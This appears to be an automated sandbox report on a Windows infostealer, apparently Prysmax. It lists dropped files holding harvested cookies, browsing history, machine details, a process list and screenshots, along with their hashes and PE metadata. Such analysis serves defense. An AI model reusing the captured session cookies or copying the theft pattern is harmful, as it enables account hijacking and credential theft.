                                                                                                                                                                                                                                                                              SHA-512:80EE800516C9A019E4EF14448F901F200E85A87B684CD8C95F6D4621743A6EE3DFBE9321F01027F8BCCF52BED6770BEEF8E1946D9A230683C7F7CB35C49424F8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:PK........x~.Y................files/PK........x~.Y....h...........information.txtuR.N.@.....m.~.*-.H.iEdI...a....p.F.....S..>...Z".Y..s..L.^..W.P....~......n./........w.-....:N7..3...A.%j.(+.([v.m.s...]J.. a..E.......O..[...3...L.<..$.U..8.....Uf8.>....Y.}V.h.....05.4.2t.8.#t...A...%Q.%M..H*..Q.........t....{.5...f.......t..l.e..^.q...y.!.f...z.....0u.ox.z.L..7..m+......e..k.\...\U..2. ......<.#.a~.HmR0H.....NUd.^..PK........t~.Y................prautofill.txt..PK........t~.Y@......V.......prcookies.txt...J.....^.6..0dB.8.fc..mco....y4.V...].}..U...Y ...3.....vn.s...Z..NY./T....y.r...b...HQ.9._..~.cK..G...D.....+..._.1.....G....D@...OI.bn..N........a.*...A=....'.6;.(p.$\C...0..M.o..K..k.......8:.pn.....u.]|.gjS|.2\...*..fh...&....R..7.:^........#.|..............M..7...].6........J.n..b.w..Z\...5..mS..DRy.6...)..Y5...6.....5*....H...A/.v.e/E..F^S?........y.X*t.....t..+....C..r...YTet....sia-..S8...+V"...e.n.i....i....w......

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\prysmax-745773\information.txt

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):671
                                                                                                                                                                                                                                                                              Entropy (8bit):4.577569385682426
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:SAMbe7bzLxAcRQN3ASVc6hWcA7p4dqpfWN2ZtTwmLRE4g4/g5SBAoXSgBu:SAMa7bp+NDWp4NyAUg5SBAovu
                                                                                                                                                                                                                                                                              MD5:B498B558E2B2A151F994C1506FE32FB1
                                                                                                                                                                                                                                                                              SHA1:003B83EA325F3CB7B40971814A2AD59ED2137EAD
                                                                                                                                                                                                                                                                              SHA-256:1CEE5A9083F8AE3813C002BFD6F8F49185DACC056AD604F6E5959127A46E609D
                                                                                                                                                                                                                                                                              SHA-512:9ABBE20A43FBE35589EEEE8A3B5B4C01556FC7401978D986E2199B8CEBE3E423F79CB62D622559DCFA51BA59D2B79C336783EB7B5B408980A9BA244B8FC86A12
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.. .. .PRYSMAX STEALER!.. .. . Network Info.. .. . IP: 8.46.123.189.. . Country: United States.. . Region: New York.. . City: New York.. . Vpn: False.. . ISP: Level 3.. ... .. . Machine Info .. .. . Pc Name: 745773.. . OS: Windows-10-10.0.19045-SP0.. . CPU: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel.. . HWID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0.. . RAM: 7.999267578125.. . GPU: .. . Windows Key: .. . Antiviruses: Windows Defender.. List of process: 210....

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\prysmax-745773\prcookies.txt

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (515), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3158
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8972122901567925
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:/JMpO2gpcRqpZX22HTSjv3pB7H7e8zLs/Zw49ckse:BkXRQSfIh
                                                                                                                                                                                                                                                                              MD5:8C6FF34551E5D45A9E60A03D31487053
                                                                                                                                                                                                                                                                              SHA1:23C65812BDDBE33010D34CA421BD4D187DF95F74
                                                                                                                                                                                                                                                                              SHA-256:5D23122C1B86CC45E5EADDED5DED8AFE6751BFC2A9AD645CE59D08AEABED5BD4
                                                                                                                                                                                                                                                                              SHA-512:B568472F1AA723F2CE29A5C5BBA33A62599237B5D5DC8ACB19D2749B9E9D662A07BA0E8DDB8408EABB4A012E498C947EF16990218E8A1F6BE2777E66FC11C0F9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.google.com.TRUE./.FALSE.2597573456.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.FALSE.2597573456.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.2597573456.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749e&LV=202310&V=4&LU=1696413236917...microsoft.com

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\prysmax-745773\prhistory.txt

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):809
                                                                                                                                                                                                                                                                              Entropy (8bit):5.165968547442475
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:2rTHwoh9wIwpjRmZDKJCwpjRSpDKJCrTV8woPpSwpjRVpbCwpjOSbpbb:SDTwIYVcDKJCYVuDKJCrSPpSYVVpbCYb
                                                                                                                                                                                                                                                                              MD5:6A260B07BAB16CDD661E99BA9E0518F6
                                                                                                                                                                                                                                                                              SHA1:13AB556855EADC64A8FC060B09C192AE2EFA2C23
                                                                                                                                                                                                                                                                              SHA-256:8014E4C7A0E9C2751F23C198AAFC5350334E087F4F56489BCEBD63EF540AB0CF
                                                                                                                                                                                                                                                                              SHA-512:FC5D394BC100D7EB1EF657BFB82F6A67A8A21EB42C2B6B50D4733AFB96DD35C46DE98A7B5055F5D1420EDE794A8190A3A63BDF3D023CBF935E8C68A68BD508EF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:https://go.microsoft.com/fwlink/?linkid=851546..https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016..https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..https://go.microsoft.com/fwlink/?LinkId=2106243..https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17..https://support.microsoft.com/en-us/office/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\prysmax-745773\process_list.txt

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16538
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2228893359206277
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:V7DbhcMGuFNZOOYeIEYAZDKaTwJx8+uyUnVjFjcycLXEbWJhUcpEVQeVRVQNNYg1:JDlcTuFNZOOYeIEYAZDKaTwz8+uyUnVc
                                                                                                                                                                                                                                                                              MD5:F5FAF197558C69C0CFEC5F930FAF44AE
                                                                                                                                                                                                                                                                              SHA1:277FF73BD187D72DA68851F30AE6CA02DC18A1AC
                                                                                                                                                                                                                                                                              SHA-256:79EDD0B5D41C69CD89BD8A8B3029D73BB822092128F65BB15AA259A5B85A2F3F
                                                                                                                                                                                                                                                                              SHA-512:CCF9D6CA5C6F71AEBF7FDAB1343AAA06A7CF1E8058FB5D8066FC2187E1F26C01B78788A1A00297DD5DA7F4A6C3B39072020E2FA7BB42BE695216FA1F4C6C940D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:..Image Name PID Session Name Session# Mem Usage..========================= ======== ================ =========== ============..System Idle Process 0 Services 0 8 K..System 4 Services 0 176 K..Registry 92 Services 0 79'468 K..smss.exe 324 Services 0 1'236 K..csrss.exe 408 Services 0 5'312 K..wininit.exe 484 Services 0 7'256 K..csrss.exe 492 Console 1 6'072 K..winlogon.exe 552 Console 1 16'700 K..services.exe 620 Services 0 12'208 K..lsass.exe 628 Services 0 19'908 K..svchost.exe 752 Services

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\prysmax-745773\screenshot.png

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):360604
                                                                                                                                                                                                                                                                              Entropy (8bit):7.992758165143328
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:6144:AAkAtanHdaPoRX4i51Y6kgFuc4NULjDmHfpGmHNeok3yfveocRZcCDnzMqmE:ABEo9aP0X4U1cRc9Yfp2qmocTcCAI
                                                                                                                                                                                                                                                                              MD5:DA53DEB000B4D8308DC246C61DC9B53F
                                                                                                                                                                                                                                                                              SHA1:A808A3CD3D138B384D7C3EBF4B6B814538503BC0
                                                                                                                                                                                                                                                                              SHA-256:1A08580C81A7B15903E0CD0CC27E8E1D6E67601676BE36E464DAC6D6BD9DE4FE
                                                                                                                                                                                                                                                                              SHA-512:816B18DC3B0AA06DD00B25703AA3F12071BC7EB6CBEDF157D452EA880F4F9258D0C8B3DDC0E0A15FC45AE80287BC49D22B113581ED5B3E593CF34B77B198D701
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............1.c.....IDATx...{.d.Q..W.93w.....VF<.+c.l.K...1.1..A..'$.$...6.....|Q........' ..H...1.?@.....^..F/dY+.v..+i....wfN..:]......w...S^_...]]]}N}....~.)Z?..dW.$\d&"".\.Kw.2)Iw.%.).Z (.z 6.\.....g2.&%....y.O~..<-?.+>c...4...#..k.S.y..\..a.#...d....i'.]`?.q.@=...rX.0.-.....4.]?.....k.....&.5].<..Q...........iP?..l..L..j...s.....I.i.7eZ;.WD..V=.v..{.<{&.R...I.U3.H..y...{..~....=.9...B...{.%.s.i.....n.c ....4...Y....."b]P..F........{.+.R.&Or..#N:kr..BDz....F#.j....c..L..qi.eY.F#.}Q.&:lK{..N.."....|t.H.JA.t...Z^.P..X.*v"R...l..v.n.A...2...t.%..R.F#S0..h0.p.UUU..JR.1.*..9.*S<{&..h.>P...u.....~4.k......v..W.Z.eY..p8T.Ln&L.TE9$..h....\]]..5.K?W...5.2.x....WUUUU).8IU.U.:.L....hTU.*.....&.%x...q...+.5xo..TIlh..+T9.z..,.w.Y.>..f.Q.w.......}...9.9MI......o7.#....6[.c..i..5...O.R..5....9f.N....U[O........h....d..;.......r.YkF........@.b..:Z%..s~.T+'Z...7PS-i/..J"..D..7.r>d....*..1..<.].]...62.Q..`p.GV..a.k..tA.Rp.Z.e...

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrdrjdmbol.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrhpzreqps.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrisnqbpuw.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                              Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrjecpqddi.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrkqoskfpt.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrqgcuwzfl.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrrtcvdzge.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrtvqsliim.db

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              \Device\ConDrv

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):78
                                                                                                                                                                                                                                                                              Entropy (8bit):4.748050898372057
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:ElBFReNmI4S2UUAuF5QEyn:EhMmI4S2UP3
                                                                                                                                                                                                                                                                              MD5:8D2E7126FD48AF00762BB44BADC4CC90
                                                                                                                                                                                                                                                                              SHA1:8A370983DCD5D7D22C364B8C3D5AF038F04DE0D9
                                                                                                                                                                                                                                                                              SHA-256:07BA02BC0A103951D9B8898F73A7A7282E70D9D967FCF97F7F9BB3A8E9B86973
                                                                                                                                                                                                                                                                              SHA-512:2049919AAB10F14A7D6E8C793904DA116A713F0FFAE808BEC1BDAB2F1D2370D81E8F9084AF00C3E8BFCE000AECDB91C02C06B4950819E5167221B46B8F79DF5F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[PYI-7680:ERROR] Failed to execute script 'main' due to unhandled exception!..

                                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Entropy (8bit):7.996969631369594
                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                              • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                              File name:main.exe
                                                                                                                                                                                                                                                                              File size:27'577'634 bytes
                                                                                                                                                                                                                                                                              MD5:c0e4c8f676e781c9dd3d57ffa4f99111
                                                                                                                                                                                                                                                                              SHA1:94a6f60949f38da538b5227722698dd880961bb2
                                                                                                                                                                                                                                                                              SHA256:9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
                                                                                                                                                                                                                                                                              SHA512:c72e37577c7c1b87404c437431db1a8e72fdb44d402d054556d7d7fb054f5504ae1302a9e7cd20621b84f9b9cc90196ea4a04668a5c8e254cb2d2ca5fae35a69
                                                                                                                                                                                                                                                                              SSDEEP:786432:59Yi93OVl8ZFrwq3ObRq2Gm1QtI+1zYCuA188yytDg/K+m5p:59zJB3CRpGiiI+fZXyytD5l
                                                                                                                                                                                                                                                                              TLSH:13573366D27108A6EAF5523E832BC25DFA10ED159BA8D54A93E00E076F5B2D0CD3CF47
                                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xh.B<...<...<...wq..;...wq......wq..6...,.W.>...,...5...,...-...,.......wq..;...<.......w...%...w...=...Rich<...........PE..d..

                                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                                              Icon Hash:2e1e7c4c4c61e979

                                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Entrypoint:0x14000c380
                                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                              Subsystem:windows cui
                                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
